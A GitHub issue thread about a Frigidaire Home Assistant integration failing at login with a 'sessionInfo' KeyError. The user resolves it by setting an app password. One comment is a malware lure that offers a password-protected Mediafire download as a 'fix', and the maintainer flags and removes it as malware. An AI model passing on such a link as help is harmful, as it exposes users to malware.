### ISSUE TITLE
Error on initial config

### ISSUE THREAD

**Issue by paulj-net** [bm1549/home-assistant-frigidaire#72]
Getting the below error on initial config after typing user/pass.  Setup fails to complete.

```Logger: custom_components.frigidaire.config_flow
Source: custom_components/frigidaire/config_flow.py:98
integration: frigidaire
First occurred: 8:00:00 PM (1 occurrences)
Last logged: 8:00:00 PM

Unexpected exception
Traceback (most recent call last):
  File "/config/custom_components/frigidaire/config_flow.py", line 98, in async_step_user
    await validate_input(self.hass, user_input)
  File "/config/custom_components/frigidaire/config_flow.py", line 70, in validate_input
    appliances = await hass.async_add_executor_job(
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/frigidaire/config_flow.py", line 54, in setup
    client = frigidaire.Frigidaire(
             ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/site-packages/frigidaire/__init__.py", line 251, in __init__
    self.authenticate()
  File "/usr/local/lib/python3.12/site-packages/frigidaire/__init__.py", line 355, in authenticate
    auth_session_token = login_response['sessionInfo']['sessionToken']
                         ~~~~~~~~~~~~~~^^^^^^^^^^^^^^^
KeyError: 'sessionInfo'

**Comment by bm1549** [comment]
Hey there 👋 can you send any other relevant logs?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bm1549** [comment]
Removed the comment from @goncastrum which was clearly malware

**Comment by bm1549** [comment]
@paulj-net I just pushed up a patch that should provide more information on the issue via #73. Please update to the latest and let me know what it says

**Comment by paulj-net** [comment]
when I attempt to login it now says "invalid authentication".  I'm not sure if it makes any difference but I'm in Canada.  I think on the web the frigidaire logins are region specific?

**Comment by bm1549** [comment]
Can you share the error message from the home assistant logs? That should include the full error response from Frigidaire

**Comment by paulj-net** [comment]
Ok so I did some more troubleshooting today.  As it turns out I had originally set up the app through google account only (no password).  I did however have a Frigidaire password that I used for online orders of parts.  I was trying to use that password but it didn't work.  Once I set a new password for the app this integration worked.

Sorry for the trouble.  And thanks for the help!
